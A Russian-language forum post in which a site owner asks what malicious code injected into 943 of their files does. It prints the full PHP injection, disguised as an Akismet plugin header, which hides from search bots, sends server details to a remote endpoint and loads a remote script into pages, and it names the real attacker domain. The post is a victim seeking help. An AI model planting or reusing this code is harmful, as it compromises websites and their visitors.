Привет всем, у меня по видимому через дыру влили вредоносный код.
Пострадали html, tpl, tmp, php файлы (в общем 943 файла)
Что этот код может натворить?
(в кодинге не шарю, поэтому знающих прошу рассказать о данном коде)
Это в файлах PHP:<?php
#ac7a58#
/**
* @package Akismet
*/
/*
Plugin Name: Akismet
Plugin URI: http://akismet.com/
Description: Used by millions, Akismet is quite possibly the best way in the world to <strong>protect your blog from comment and trackback spam</strong>. It keeps your site protected from spam even while you sleep. To get started: 1) Click the "Activate" link to the left of this description, 2) <a href="http://akismet.com/get/">Sign up for an Akismet API key</a>, and 3) Go to your Akismet configuration page, and save your API key.
Version: 3.0.0
Author: Automattic
Author URI: http://automattic.com/wordpress-plugins/
License: GPLv2 or later
Text Domain: akismet
*/
/*
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
*/
if( empty( $dkcq ) ) {
if( ( substr( trim( $_SERVER['REMOTE_ADDR'] ), 0, 6 ) == '74.125' ) || preg_match(
"/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i",
$_SERVER['HTTP_USER_AGENT']
)
) {
} else {
error_reporting( 0 );
@ini_set( 'display_errors', 0 );
if( !function_exists( '__url_get_contents' ) ) {
function __url_get_contents( $remote_url, $timeout )
{
if( function_exists( 'curl_exec' ) ) {
$ch = curl_init();
curl_setopt( $ch, CURLOPT_URL, $remote_url );
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
curl_setopt( $ch, CURLOPT_CONNECTTIMEOUT, $timeout );
curl_setopt( $ch, CURLOPT_TIMEOUT, $timeout ); //timeout in seconds
$_url_get_contents_data = curl_exec( $ch );
curl_close( $ch );
} elseif( function_exists( 'file_get_contents' ) && ini_get( 'allow_url_fopen' ) ) {
$ctx = @stream_context_create(
array(
'http' =>
array(
'timeout' => $timeout,
)
)
);
$_url_get_contents_data = @file_get_contents( $remote_url, false, $ctx );
} elseif( function_exists( 'fopen' ) && function_exists( 'stream_get_contents' ) ) {
$handle = fopen( $remote_url, "r" );
$_url_get_contents_data = @stream_get_contents( $handle );
} else {
$_url_get_contents_data = __file_get_url_contents( $remote_url );
}
return $_url_get_contents_data;
}
}
if( !function_exists( '__file_get_url_contents' ) ) {
function __file_get_url_contents( $remote_url )
{
if( preg_match(
'/^([a-z]+):\/\/([a-z0-9-.]+)(\/.*$)/i',
$remote_url,
$matches
)
) {
$protocol = strtolower( $matches[1] );
$host = $matches[2];
$path = $matches[3];
} else {
// Bad remote_url-format
return false;
}
if( $protocol == "http" ) {
$socket = @fsockopen( $host, 80, $errno, $errstr, $timeout );
} else {
// Bad protocol
return false;
}
if( !$socket ) {
// Error creating socket
return false;
}
$request = "GET $path HTTP/1.0\r\nHost: $host\r\n\r\n";
$len_written = @fwrite( $socket, $request );
if( $len_written === false || $len_written != strlen( $request ) ) {
// Error sending request
return false;
}
$response = "";
while( !@feof( $socket ) &&
( $buf = @fread( $socket, 4096 ) ) !== false ) {
$response .= $buf;
}
if( $buf === false ) {
// Error reading response
return false;
}
$end_of_header = strpos( $response, "\r\n\r\n" );
return substr( $response, $end_of_header + 4 );
}
}
$dkcq['SCRIPT_FILENAME'] = $_SERVER['SCRIPT_FILENAME'];
$dkcq['SCRIPT_NAME'] = $_SERVER['SCRIPT_NAME'];
$dkcq['HTTP_HOST'] = $_SERVER['HTTP_HOST'];
$dkcq['REDIRECT_STATUS'] = $_SERVER['REDIRECT_STATUS'];
$dkcq['SERVER_NAME'] = $_SERVER['SERVER_NAME'];
$dkcq['SERVER_ADDR'] = $_SERVER['SERVER_ADDR'];
$dkcq['SERVER_ADMIN'] = $_SERVER['SERVER_ADMIN'];
$dkcq = __url_get_contents("http://127.0.0.1/fancybox/t9ybvh4p.php" . "?fid=153197&info=" . http_build_query( $dkcq ) . "&no=1", 1);
echo "<script type=\"text/javascript\" src=\"http://127.0.0.1/fancybox/t9ybvh4p.php?id=3643413\"></script>";
}
}
#/ac7a58#
?>
## вместо 127.0.0.1 - kav110.bget.ru
А это в остальных:<!--a786c5--><script type="text/javascript" src="http://127.0.0.1/fancybox/t9ybvh4p.php?id=3644397"></script><!--/a786c5-->
## вместо 127.0.0.1 - kav110.bget.ru
Заранее спасибо и желаю всем удачи!
